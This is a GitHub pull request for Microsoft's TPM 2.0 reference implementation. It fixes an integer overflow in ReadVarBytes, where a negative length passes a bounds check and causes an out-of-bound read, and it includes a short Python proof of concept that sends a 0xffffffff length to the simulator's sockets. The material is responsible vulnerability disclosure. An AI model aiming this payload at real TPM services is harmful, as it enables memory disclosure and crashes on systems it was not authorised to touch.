search

microsoft / ms-tpm-20-ref

Reference implementation of the TCG Trusted Platform Module 2.0 specification.
Other
333 stars 133 forks source link

fix integer overflow in ReadVarBytes #100

Closed v0id-re closed 1 year ago

v0id-re commented 1 year ago

length is a signed 32-bit integer and is read from input. So if we pass a value that is greater than INT32_MAX, length will become negative. Then it can pass the MaxLen check. The second ReadBytes will return true if the NumBytes is negative.

This can cause an out-of-bound read in TPM_SIGNAL_HASH_DATA because InputBuffer.BufferSize is greater than real size of InputBuffer. Poc is below.

from socket import socket, AF_INET, SOCK_STREAM

tpmSock = socket(AF_INET, SOCK_STREAM)
tpmSock.connect(('127.0.0.1', 2321))

platformSock = socket(AF_INET, SOCK_STREAM)
platformSock.connect(('127.0.0.1', 2322))

platformSock.send(b'\x00\x00\x00\x01')
platResp = platformSock.recv(32)

print(b"Platform RES32:" + platResp)

tpmSock.send(b'\x00\x00\x00\x05') # TPM_SIGNAL_HASH_START
tpmSock.send(b'\x00\x00\x00\x06') # TPM_SIGNAL_HASH_DATA
tpmSock.send(b'\xff\xff\xff\xff') # -1

resp = tpmSock.recv(4096)
print(b"TPM RES4096:" + resp)
v0id-re commented 1 year ago

Thanks to @CTF-YeMei

bradlitterell commented 1 year ago

thank you @v0id-re